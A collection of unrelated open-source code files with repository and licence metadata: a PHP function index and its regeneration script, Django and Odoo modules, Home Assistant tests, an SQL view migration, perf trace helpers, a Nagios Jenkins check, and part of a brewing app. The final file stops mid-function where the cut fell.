'Session PgSQL': ['session_pgsql_add_error',
'session_pgsql_get_error',
'session_pgsql_get_field',
'session_pgsql_reset',
'session_pgsql_set_field',
'session_pgsql_status'],
'Shared Memory': ['shmop_close',
'shmop_delete',
'shmop_open',
'shmop_read',
'shmop_size',
'shmop_write'],
'SimpleXML': ['simplexml_import_dom',
'simplexml_load_file',
'simplexml_load_string'],
'Socket': ['socket_accept',
'socket_bind',
'socket_clear_error',
'socket_close',
'socket_connect',
'socket_create_listen',
'socket_create_pair',
'socket_create',
'socket_get_option',
'socket_getpeername',
'socket_getsockname',
'socket_last_error',
'socket_listen',
'socket_read',
'socket_recv',
'socket_recvfrom',
'socket_select',
'socket_send',
'socket_sendto',
'socket_set_block',
'socket_set_nonblock',
'socket_set_option',
'socket_shutdown',
'socket_strerror',
'socket_write'],
'Solr': ['solr_get_version'],
'Statistic': ['stats_absolute_deviation',
'stats_cdf_beta',
'stats_cdf_binomial',
'stats_cdf_cauchy',
'stats_cdf_chisquare',
'stats_cdf_exponential',
'stats_cdf_f',
'stats_cdf_gamma',
'stats_cdf_laplace',
'stats_cdf_logistic',
'stats_cdf_negative_binomial',
'stats_cdf_noncentral_chisquare',
'stats_cdf_noncentral_f',
'stats_cdf_poisson',
'stats_cdf_t',
'stats_cdf_uniform',
'stats_cdf_weibull',
'stats_covariance',
'stats_den_uniform',
'stats_dens_beta',
'stats_dens_cauchy',
'stats_dens_chisquare',
'stats_dens_exponential',
'stats_dens_f',
'stats_dens_gamma',
'stats_dens_laplace',
'stats_dens_logistic',
'stats_dens_negative_binomial',
'stats_dens_normal',
'stats_dens_pmf_binomial',
'stats_dens_pmf_hypergeometric',
'stats_dens_pmf_poisson',
'stats_dens_t',
'stats_dens_weibull',
'stats_harmonic_mean',
'stats_kurtosis',
'stats_rand_gen_beta',
'stats_rand_gen_chisquare',
'stats_rand_gen_exponential',
'stats_rand_gen_f',
'stats_rand_gen_funiform',
'stats_rand_gen_gamma',
'stats_rand_gen_ibinomial_negative',
'stats_rand_gen_ibinomial',
'stats_rand_gen_int',
'stats_rand_gen_ipoisson',
'stats_rand_gen_iuniform',
'stats_rand_gen_noncenral_chisquare',
'stats_rand_gen_noncentral_f',
'stats_rand_gen_noncentral_t',
'stats_rand_gen_normal',
'stats_rand_gen_t',
'stats_rand_get_seeds',
'stats_rand_phrase_to_seeds',
'stats_rand_ranf',
'stats_rand_setall',
'stats_skew',
'stats_standard_deviation',
'stats_stat_binomial_coef',
'stats_stat_correlation',
'stats_stat_gennch',
'stats_stat_independent_t',
'stats_stat_innerproduct',
'stats_stat_noncentral_t',
'stats_stat_paired_t',
'stats_stat_percentile',
'stats_stat_powersum',
'stats_variance'],
'Stomp': ['stomp_connect_error', 'stomp_version'],
'Stream': ['set_socket_blocking',
'stream_bucket_append',
'stream_bucket_make_writeable',
'stream_bucket_new',
'stream_bucket_prepend',
'stream_context_create',
'stream_context_get_default',
'stream_context_get_options',
'stream_context_get_params',
'stream_context_set_default',
'stream_context_set_option',
'stream_context_set_params',
'stream_copy_to_stream',
'stream_encoding',
'stream_filter_append',
'stream_filter_prepend',
'stream_filter_register',
'stream_filter_remove',
'stream_get_contents',
'stream_get_filters',
'stream_get_line',
'stream_get_meta_data',
'stream_get_transports',
'stream_get_wrappers',
'stream_is_local',
'stream_notification_callback',
'stream_register_wrapper',
'stream_resolve_include_path',
'stream_select'],
'String': ['addcslashes',
'addslashes',
'bin2hex',
'chop',
'chr',
'chunk_split',
'convert_cyr_string',
'convert_uudecode',
'convert_uuencode',
'count_chars',
'crc32',
'crypt',
'echo',
'explode',
'fprintf',
'get_html_translation_table',
'hebrev',
'hebrevc',
'html_entity_decode',
'htmlentities',
'htmlspecialchars_decode',
'htmlspecialchars',
'implode',
'join',
'lcfirst',
'levenshtein',
'localeconv',
'ltrim',
'md5_file',
'md5',
'metaphone',
'money_format',
'nl_langinfo',
'nl2br',
'number_format',
'ord',
'parse_str',
'print',
'printf',
'quoted_printable_decode',
'quoted_printable_encode',
'quotemeta',
'rtrim',
'setlocale',
'sha1_file',
'sha1',
'similar_text',
'soundex',
'sprintf',
'sscanf',
'str_getcsv',
'str_ireplace',
'str_pad',
'str_repeat',
'str_replace',
'str_rot13',
'str_shuffle',
'str_split',
'str_word_count',
'strcasecmp',
'strchr',
'strcmp',
'strcoll',
'strcspn',
'strip_tags',
'stripcslashes',
'stripos',
'stripslashes',
'stristr',
'strlen',
'strnatcasecmp',
'strnatcmp',
'strncasecmp',
'strncmp',
'strpbrk',
'strpos',
'strrchr',
'strrev',
'strripos',
'strrpos',
'strspn'],
'Sybase': ['sybase_affected_rows',
'sybase_close',
'sybase_connect',
'sybase_data_seek',
'sybase_deadlock_retry_count',
'sybase_fetch_array',
'sybase_fetch_assoc',
'sybase_fetch_field',
'sybase_fetch_object',
'sybase_fetch_row',
'sybase_field_seek',
'sybase_free_result',
'sybase_get_last_message',
'sybase_min_client_severity',
'sybase_min_error_severity',
'sybase_min_message_severity',
'sybase_min_server_severity',
'sybase_num_fields',
'sybase_num_rows',
'sybase_pconnect',
'sybase_query',
'sybase_result',
'sybase_select_db',
'sybase_set_message_handler',
'sybase_unbuffered_query'],
'TCP': ['tcpwrap_check'],
'Tidy': ['ob_tidyhandler',
'tidy_access_count',
'tidy_config_count',
'tidy_error_count',
'tidy_get_error_buffer',
'tidy_get_output',
'tidy_load_config',
'tidy_reset_config',
'tidy_save_config',
'tidy_set_encoding',
'tidy_setopt',
'tidy_warning_count'],
'Tokenizer': ['token_get_all', 'token_name'],
'URL': ['base64_decode',
'base64_encode',
'get_headers',
'get_meta_tags',
'http_build_query',
'parse_url',
'rawurldecode',
'rawurlencode',
'urldecode',
'urlencode'],
'Variable handling': ['debug_zval_dump',
'doubleval',
'empty',
'floatval',
'get_defined_vars',
'get_resource_type',
'gettype',
'import_request_variables',
'intval',
'is_array',
'is_bool',
'is_callable',
'is_double',
'is_float',
'is_int',
'is_integer',
'is_long',
'is_null',
'is_numeric',
'is_object',
'is_real',
'is_resource',
'is_scalar',
'is_string',
'isset',
'print_r',
'serialize',
'settype',
'strval',
'unserialize',
'unset',
'var_dump',
'var_export'],
'W32api': ['w32api_deftype',
'w32api_init_dtype',
'w32api_invoke_function',
'w32api_register_function',
'w32api_set_call_method'],
'WDDX': ['wddx_add_vars',
'wddx_deserialize',
'wddx_packet_end',
'wddx_packet_start',
'wddx_serialize_value',
'wddx_serialize_vars',
'wddx_unserialize'],
'WinCache': ['wincache_fcache_fileinfo',
'wincache_fcache_meminfo',
'wincache_lock',
'wincache_ocache_fileinfo',
'wincache_ocache_meminfo',
'wincache_refresh_if_changed',
'wincache_rplist_fileinfo',
'wincache_rplist_meminfo',
'wincache_scache_info',
'wincache_scache_meminfo',
'wincache_ucache_add',
'wincache_ucache_cas',
'wincache_ucache_clear',
'wincache_ucache_dec',
'wincache_ucache_delete',
'wincache_ucache_exists',
'wincache_ucache_get',
'wincache_ucache_inc',
'wincache_ucache_info',
'wincache_ucache_meminfo',
'wincache_ucache_set',
'wincache_unlock'],
'XML Parser': ['utf8_decode'],
'XML-RPC': ['xmlrpc_decode_request',
'xmlrpc_decode',
'xmlrpc_encode_request',
'xmlrpc_encode',
'xmlrpc_get_type',
'xmlrpc_is_fault',
'xmlrpc_parse_method_descriptions',
'xmlrpc_server_add_introspection_data',
'xmlrpc_server_call_method',
'xmlrpc_server_create',
'xmlrpc_server_destroy',
'xmlrpc_server_register_introspection_callback',
'xmlrpc_server_register_method',
'xmlrpc_set_type'],
'XSLT (PHP4)': ['xslt_backend_info',
'xslt_backend_name',
'xslt_backend_version',
'xslt_create',
'xslt_errno',
'xslt_error',
'xslt_free',
'xslt_getopt',
'xslt_process',
'xslt_set_base',
'xslt_set_encoding',
'xslt_set_error_handler',
'xslt_set_log',
'xslt_set_object',
'xslt_set_sax_handler',
'xslt_set_sax_handlers',
'xslt_set_scheme_handler',
'xslt_set_scheme_handlers',
'xslt_setopt'],
'YAZ': ['yaz_addinfo',
'yaz_ccl_conf',
'yaz_ccl_parse',
'yaz_close',
'yaz_connect',
'yaz_database',
'yaz_element',
'yaz_errno',
'yaz_error',
'yaz_es_result',
'yaz_es',
'yaz_get_option',
'yaz_hits',
'yaz_itemorder',
'yaz_present',
'yaz_range',
'yaz_record',
'yaz_scan_result',
'yaz_scan',
'yaz_schema',
'yaz_search',
'yaz_set_option',
'yaz_sort',
'yaz_syntax',
'yaz_wait'],
'YP/NIS': ['yp_all',
'yp_cat',
'yp_err_string',
'yp_errno',
'yp_first',
'yp_get_default_domain',
'yp_master',
'yp_match',
'yp_next',
'yp_order'],
'Yaml': ['yaml_emit_file',
'yaml_emit',
'yaml_parse_file',
'yaml_parse_url',
'yaml_parse'],
'Zip': ['zip_close',
'zip_entry_close',
'zip_entry_compressedsize',
'zip_entry_compressionmethod',
'zip_entry_filesize',
'zip_entry_name',
'zip_entry_open',
'zip_entry_read',
'zip_open',
'zip_read'],
'Zlib': ['gzclose',
'gzcompress',
'gzdecode',
'gzdeflate',
'gzencode',
'gzeof',
'gzfile',
'gzgetc',
'gzgets',
'gzgetss',
'gzinflate',
'gzopen',
'gzpassthru',
'gzputs',
'gzread',
'gzrewind',
'gzseek',
'gztell',
'gzuncompress',
'gzwrite',
'readgzfile',
'zlib_get_coding_type'],
'bcompiler': ['bcompiler_load_exe',
'bcompiler_load',
'bcompiler_parse_class',
'bcompiler_read',
'bcompiler_write_class',
'bcompiler_write_constant',
'bcompiler_write_exe_footer',
'bcompiler_write_file',
'bcompiler_write_footer',
'bcompiler_write_function',
'bcompiler_write_functions_from_file',
'bcompiler_write_header',
'bcompiler_write_included_filename'],
'cURL': ['curl_close',
'curl_copy_handle',
'curl_errno',
'curl_error',
'curl_exec',
'curl_getinfo',
'curl_init',
'curl_multi_add_handle',
'curl_multi_close',
'curl_multi_exec',
'curl_multi_getcontent',
'curl_multi_info_read',
'curl_multi_init',
'curl_multi_remove_handle',
'curl_multi_select',
'curl_setopt_array',
'curl_setopt',
'curl_version'],
'chdb': ['chdb_create'],
'dBase': ['dbase_add_record',
'dbase_close',
'dbase_create',
'dbase_delete_record',
'dbase_get_header_info',
'dbase_get_record_with_names',
'dbase_get_record',
'dbase_numfields',
'dbase_numrecords',
'dbase_open',
'dbase_pack',
'dbase_replace_record'],
'dbx': ['dbx_close',
'dbx_compare',
'dbx_connect',
'dbx_error',
'dbx_escape_string',
'dbx_fetch_row'],
'filePro': ['filepro_fieldcount',
'filepro_fieldname',
'filepro_fieldtype',
'filepro_fieldwidth',
'filepro_retrieve',
'filepro_rowcount',
'filepro'],
'iconv': ['iconv_get_encoding',
'iconv_mime_decode_headers',
'iconv_mime_decode',
'iconv_mime_encode',
'iconv_set_encoding',
'iconv_strlen',
'iconv_strpos',
'iconv_strrpos',
'iconv_substr',
'iconv',
'ob_iconv_handler'],
'inclued': ['inclued_get_data'],
'intl': ['intl_error_name',
'intl_get_error_code',
'intl_get_error_message',
'intl_is_failure'],
'libxml': ['libxml_clear_errors',
'libxml_disable_entity_loader',
'libxml_get_errors',
'libxml_get_last_error',
'libxml_set_streams_context',
'libxml_use_internal_errors'],
'mSQL': ['msql_affected_rows',
'msql_close',
'msql_connect',
'msql_create_db',
'msql_createdb',
'msql_data_seek',
'msql_db_query',
'msql_dbname',
'msql_drop_db',
'msql_error',
'msql_fetch_array',
'msql_fetch_field',
'msql_fetch_object',
'msql_fetch_row',
'msql_field_flags',
'msql_field_len',
'msql_field_name',
'msql_field_seek',
'msql_field_table',
'msql_field_type',
'msql_fieldflags',
'msql_fieldlen',
'msql_fieldname',
'msql_fieldtable',
'msql_fieldtype',
'msql_free_result',
'msql_list_dbs',
'msql_list_fields',
'msql_list_tables',
'msql_num_fields',
'msql_num_rows',
'msql_numfields',
'msql_numrows',
'msql_pconnect',
'msql_query',
'msql_regcase',
'msql_result',
'msql_select_db',
'msql_tablename',
'msql'],
'mnoGoSearch': ['udm_add_search_limit',
'udm_alloc_agent_array',
'udm_alloc_agent',
'udm_api_version',
'udm_cat_list',
'udm_cat_path',
'udm_check_charset',
'udm_check_stored',
'udm_clear_search_limits',
'udm_close_stored',
'udm_crc32',
'udm_errno',
'udm_error',
'udm_find',
'udm_free_agent',
'udm_free_ispell_data',
'udm_free_res',
'udm_get_doc_count',
'udm_get_res_field',
'udm_get_res_param',
'udm_hash32',
'udm_load_ispell_data',
'udm_open_stored',
'udm_set_agent_param'],
'mqseries': ['mqseries_back',
'mqseries_begin',
'mqseries_close',
'mqseries_cmit',
'mqseries_conn',
'mqseries_connx',
'mqseries_disc',
'mqseries_get',
'mqseries_inq',
'mqseries_open',
'mqseries_put1',
'mqseries_put',
'mqseries_set',
'mqseries_strerror'],
'mysqlnd_qc': ['mysqlnd_qc_change_handler',
'mysqlnd_qc_clear_cache',
'mysqlnd_qc_get_cache_info',
'mysqlnd_qc_get_core_stats',
'mysqlnd_qc_get_handler',
'mysqlnd_qc_get_query_trace_log',
'mysqlnd_qc_set_user_handlers'],
'qtdom': ['qdom_error', 'qdom_tree'],
'runkit': ['runkit_class_adopt',
'runkit_class_emancipate',
'runkit_constant_add',
'runkit_constant_redefine',
'runkit_constant_remove',
'runkit_function_add',
'runkit_function_copy',
'runkit_function_redefine',
'runkit_function_remove',
'runkit_function_rename',
'runkit_import',
'runkit_lint_file',
'runkit_lint',
'runkit_method_add',
'runkit_method_copy',
'runkit_method_redefine',
'runkit_method_remove',
'runkit_method_rename',
'runkit_return_value_used',
'runkit_sandbox_output_handler',
'runkit_superglobals'],
'ssdeep': ['ssdeep_fuzzy_compare',
'ssdeep_fuzzy_hash_filename',
'ssdeep_fuzzy_hash'],
'vpopmail': ['vpopmail_add_alias_domain_ex',
'vpopmail_add_alias_domain',
'vpopmail_add_domain_ex',
'vpopmail_add_domain',
'vpopmail_add_user',
'vpopmail_alias_add',
'vpopmail_alias_del_domain',
'vpopmail_alias_del',
'vpopmail_alias_get_all',
'vpopmail_alias_get',
'vpopmail_auth_user',
'vpopmail_del_domain_ex',
'vpopmail_del_domain',
'vpopmail_del_user',
'vpopmail_error',
'vpopmail_passwd',
'vpopmail_set_user_quota'],
'win32ps': ['win32_ps_list_procs', 'win32_ps_stat_mem', 'win32_ps_stat_proc'],
'win32service': ['win32_continue_service',
'win32_create_service',
'win32_delete_service',
'win32_get_last_control_message',
'win32_pause_service',
'win32_query_service_status',
'win32_set_service_status',
'win32_start_service_ctrl_dispatcher',
'win32_start_service',
'win32_stop_service'],
'xattr': ['xattr_get',
'xattr_list',
'xattr_remove',
'xattr_set',
'xattr_supported'],
'xdiff': ['xdiff_file_bdiff_size',
'xdiff_file_bdiff',
'xdiff_file_bpatch',
'xdiff_file_diff_binary',
'xdiff_file_diff',
'xdiff_file_merge3',
'xdiff_file_patch_binary',
'xdiff_file_patch',
'xdiff_file_rabdiff',
'xdiff_string_bdiff_size',
'xdiff_string_bdiff',
'xdiff_string_bpatch',
'xdiff_string_diff_binary',
'xdiff_string_diff',
'xdiff_string_merge3',
'xdiff_string_patch_binary',
'xdiff_string_patch',
'xdiff_string_rabdiff']}
if __name__ == '__main__':
import glob
import os
import pprint
import re
import shutil
import tarfile
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
PHP_MANUAL_URL = 'http://us3.php.net/distributions/manual/php_manual_en.tar.gz'
PHP_MANUAL_DIR = './php-chunked-xhtml/'
PHP_REFERENCE_GLOB = 'ref.*'
PHP_FUNCTION_RE = '<a href="function\..*?\.html">(.*?)</a>'
PHP_MODULE_RE = '<title>(.*?) Functions</title>'
def get_php_functions():
function_re = re.compile(PHP_FUNCTION_RE)
module_re = re.compile(PHP_MODULE_RE)
modules = {}
for file in get_php_references():
module = ''
for line in open(file):
if not module:
search = module_re.search(line)
if search:
module = search.group(1)
modules[module] = []
elif '<h2>Table of Contents</h2>' in line:
for match in function_re.finditer(line):
fn = match.group(1)
if '->' not in fn and '::' not in fn:
modules[module].append(fn)
# These are dummy manual pages, not actual functions
if module == 'PHP Options/Info':
modules[module].remove('main')
elif module == 'Filesystem':
modules[module].remove('delete')
if not modules[module]:
del modules[module]
break
return modules
def get_php_references():
download = urlretrieve(PHP_MANUAL_URL)
tar = tarfile.open(download[0])
tar.extractall()
tar.close()
for file in glob.glob("%s%s" % (PHP_MANUAL_DIR, PHP_REFERENCE_GLOB)):
yield file
os.remove(download[0])
def regenerate(filename, modules):
f = open(filename)
try:
content = f.read()
finally:
f.close()
header = content[:content.find('MODULES = {')]
footer = content[content.find("if __name__ == '__main__':"):]
f = open(filename, 'w')
f.write(header)
f.write('MODULES = %s\n\n' % pprint.pformat(modules))
f.write(footer)
f.close()
def run():
print('>> Downloading Function Index')
modules = get_php_functions()
total = sum(len(v) for v in modules.values())
print('%d functions found' % total)
regenerate(__file__, modules)
shutil.rmtree(PHP_MANUAL_DIR)
run()
|
bsd-2-clause
|
petervanderdoes/wger
|
wger/utils/fields.py
|
1
|
1559
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# Standard Library
import logging
# Third Party
from django.db import models
# wger
from wger.utils.widgets import (
Html5FormDateField,
Html5FormTimeField
)
logger = logging.getLogger(__name__)
class Html5TimeField(models.TimeField):
'''
Custom Time field that uses the Html5TimeInput widget
'''
def formfield(self, **kwargs):
'''
Use our custom field
'''
defaults = {'form_class': Html5FormTimeField}
defaults.update(kwargs)
return super(Html5TimeField, self).formfield(**defaults)
class Html5DateField(models.DateField):
'''
Custom Time field that uses the Html5DateInput widget
'''
def formfield(self, **kwargs):
'''
Use our custom field
'''
defaults = {'form_class': Html5FormDateField}
defaults.update(kwargs)
return super(Html5DateField, self).formfield(**defaults)
|
agpl-3.0
|
PongPi/isl-odoo
|
addons/note_pad/__openerp__.py
|
312
|
1691
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Memos pad',
'version': '0.1',
'category': 'Tools',
'description': """
This module update memos inside OpenERP for using an external pad
=================================================================
Use for update your text memo in real time with the following user that you invite.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/notes',
'summary': 'Sticky memos, Collaborative',
'depends': [
'mail',
'pad',
'note',
],
'data': [
'note_pad_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
Teagan42/home-assistant
|
tests/components/http/test_data_validator.py
|
7
|
1929
|
"""Test data validator decorator."""
from unittest.mock import Mock
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.http.data_validator import RequestDataValidator
async def get_client(aiohttp_client, validator):
"""Generate a client that hits a view decorated with validator."""
app = web.Application()
app["hass"] = Mock(is_running=True)
class TestView(HomeAssistantView):
url = "/"
name = "test"
requires_auth = False
@validator
async def post(self, request, data):
"""Test method."""
return b""
TestView().register(app, app.router)
client = await aiohttp_client(app)
return client
async def test_validator(aiohttp_client):
"""Test the validator."""
client = await get_client(
aiohttp_client, RequestDataValidator(vol.Schema({vol.Required("test"): str}))
)
resp = await client.post("/", json={"test": "bla"})
assert resp.status == 200
resp = await client.post("/", json={"test": 100})
assert resp.status == 400
resp = await client.post("/")
assert resp.status == 400
async def test_validator_allow_empty(aiohttp_client):
"""Test the validator with empty data."""
client = await get_client(
aiohttp_client,
RequestDataValidator(
vol.Schema(
{
# Although we allow empty, our schema should still be able
# to validate an empty dict.
vol.Optional("test"): str
}
),
allow_empty=True,
),
)
resp = await client.post("/", json={"test": "bla"})
assert resp.status == 200
resp = await client.post("/", json={"test": 100})
assert resp.status == 400
resp = await client.post("/")
assert resp.status == 200
|
apache-2.0
|
uclouvain/osis
|
base/migrations/0054_scoresencoding.py
|
1
|
2269
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-02 15:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('base', '0053_auto_20160529_2355'),
]
operations = [
migrations.RunSQL(
"""
DROP VIEW IF EXISTS app_scores_encoding;
CREATE OR REPLACE VIEW app_scores_encoding AS
SELECT row_number() OVER () as id,
base_programmanager.id as program_manager_id,
program_manager_person.id as pgm_manager_person_id,
base_offeryear.id as offer_year_id,
base_learningunityear.id as learning_unit_year_id,
count(base_examenrollment.id) as total_exam_enrollments,
sum(case when base_examenrollment.score_final is not null or base_examenrollment.justification_final is not null then 1 else 0 end) exam_enrollments_encoded
from base_examenrollment
join base_sessionexam on base_sessionexam.id = base_examenrollment.session_exam_id
join base_learningunityear on base_learningunityear.id = base_sessionexam.learning_unit_year_id
join base_offeryearcalendar on base_offeryearcalendar.id = base_sessionexam.offer_year_calendar_id
join base_learningunitenrollment on base_learningunitenrollment.id = base_examenrollment.learning_unit_enrollment_id
join base_offerenrollment on base_offerenrollment.id = base_learningunitenrollment.offer_enrollment_id
join base_offeryear on base_offeryear.id = base_offerenrollment.offer_year_id
join base_programmanager on base_programmanager.offer_year_id = base_offeryear.id
join base_person program_manager_person on program_manager_person.id = base_programmanager.person_id
where base_offeryearcalendar.start_date <= CURRENT_TIMESTAMP::date
and base_offeryearcalendar.end_date >= CURRENT_TIMESTAMP::date
group by
base_programmanager.id,
program_manager_person.id,
base_offeryear.id,
base_learningunityear.id
;
""",
elidable=True
),
]
|
agpl-3.0
|
fermasia/android_kernel_oneplus_msm8974
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py
|
11088
|
3246
|
# Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = flag_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = symbolic_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = trace_flags.keys()
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | ";
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
def taskState(state):
states = {
0 : "R",
1 : "S",
2 : "D",
64: "DEAD"
}
if state not in states:
return "Unknown"
return states[state]
class EventHeaders:
def __init__(self, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
self.cpu = common_cpu
self.secs = common_secs
self.nsecs = common_nsecs
self.pid = common_pid
self.comm = common_comm
def ts(self):
return (self.secs * (10 ** 9)) + self.nsecs
def ts_format(self):
return "%d.%d" % (self.secs, int(self.nsecs / 1000))
|
gpl-2.0
|
openstack/third-party-ci-tools
|
monitoring/nagios/checks/check_jenkins.py
|
4
|
1519
|
#!/usr/bin/env python
import argparse
import urllib
import utils
def check_jenkins_status(job_name, warning_threshold, critial_threshold):
"""Returns a tuple of exit code and message string
Exit codes are either 2 -> critical, 1 -> warning, or 0 -> OK
There code is determined based on the job health score and thresholds
passed into the script.
"""
try:
target_url = 'http://localhost:8080/job/%s/api/python' % job_name
jenkins_volume_job = eval(urllib.urlopen(target_url).read())
if jenkins_volume_job:
health_score = jenkins_volume_job['healthReport'][0]['score']
exit_code = 0
if health_score <= critial_threshold:
exit_code = 2
elif health_score <= warning_threshold:
exit_code = 1
return exit_code, 'Jenkins job health score is ' + str(health_score)
except Exception, e:
return 2, 'Error checking jenkins job status: ' + e.message
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Check jenkins job status.')
parser.add_argument('--job', required=True, type=str, help='the job name to check for')
parser.add_argument('-w', required=True, type=int, help='warning threshold of health score')
parser.add_argument('-c', required=True, type=int, help='critical threshold of health score')
args = parser.parse_args()
code, message = check_jenkins_status(args.job, args.w, args.c)
print message
exit(code)
|
apache-2.0
|
mapr/hue
|
desktop/core/ext-py/Django-1.6.10/django/http/utils.py
|
134
|
1501
|
"""
Functions that modify an HTTP request or response in some way.
"""
# This group of functions are run as part of the response handling, after
# everything else, including all response middleware. Think of them as
# "compulsory response middleware". Be careful about what goes here, because
# it's a little fiddly to override this behavior, so they should be truly
# universally applicable.
def fix_location_header(request, response):
"""
Ensures that we always use an absolute URI in any location header in the
response. This is required by RFC 2616, section 14.30.
Code constructing response objects is free to insert relative paths, as
this function converts them to absolute paths.
"""
if 'Location' in response and request.get_host():
response['Location'] = request.build_absolute_uri(response['Location'])
return response
def conditional_content_removal(request, response):
"""
Removes the content of responses for HEAD requests, 1xx, 204 and 304
responses. Ensures compliance with RFC 2616, section 4.3.
"""
if 100 <= response.status_code < 200 or response.status_code in (204, 304):
if response.streaming:
response.streaming_content = []
else:
response.content = b''
response['Content-Length'] = '0'
if request.method == 'HEAD':
if response.streaming:
response.streaming_content = []
else:
response.content = b''
return response
|
apache-2.0
|
EduPepperPD/pepper2013
|
lms/djangoapps/bulk_email/forms.py
|
8
|
1640
|
"""
Defines a form for providing validation of CourseEmail templates.
"""
import logging
from django import forms
from django.core.exceptions import ValidationError
from bulk_email.models import CourseEmailTemplate, COURSE_EMAIL_MESSAGE_BODY_TAG
log = logging.getLogger(__name__)
class CourseEmailTemplateForm(forms.ModelForm):
"""Form providing validation of CourseEmail templates."""
class Meta: # pylint: disable=C0111
model = CourseEmailTemplate
def _validate_template(self, template):
"""Check the template for required tags."""
index = template.find(COURSE_EMAIL_MESSAGE_BODY_TAG)
if index < 0:
msg = 'Missing tag: "{}"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)
log.warning(msg)
raise ValidationError(msg)
if template.find(COURSE_EMAIL_MESSAGE_BODY_TAG, index + 1) >= 0:
msg = 'Multiple instances of tag: "{}"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)
log.warning(msg)
raise ValidationError(msg)
# TODO: add more validation here, including the set of known tags
# for which values will be supplied. (Email will fail if the template
# uses tags for which values are not supplied.)
def clean_html_template(self):
"""Validate the HTML template."""
template = self.cleaned_data["html_template"]
self._validate_template(template)
return template
def clean_plain_template(self):
"""Validate the plaintext template."""
template = self.cleaned_data["plain_template"]
self._validate_template(template)
return template
|
agpl-3.0
|
314r/joliebulle
|
joliebulle/view/base.py
|
1
|
1815
|
#joliebulle 3.6
#Copyright (C) 2010-2016 Pierre Tavares
#Copyright (C) 2012-2015 joliebulle's authors
#See AUTHORS file.
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 3
#of the License, or (at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from PyQt5 import QtGui
from base import ImportBase
from view.yeastview import *
def getFermentablesQtModel():
model = QtGui.QStandardItemModel()
for f in ImportBase().listeFermentables:
item = QtGui.QStandardItem(f.name)
item.setData(f, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getHopsQtModel():
model = QtGui.QStandardItemModel()
for h in ImportBase().listeHops :
item = QtGui.QStandardItem(h.name)
item.setData(h, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getMiscsQtModel():
model = QtGui.QStandardItemModel()
for m in ImportBase().listeMiscs:
item = QtGui.QStandardItem(m.name)
item.setData(m, view.constants.MODEL_DATA_ROLE)
model.appendRow(item)
return model
def getYeastsQtModel():
model = QtGui.QStandardItemModel()
for y in ImportBase().listeYeasts:
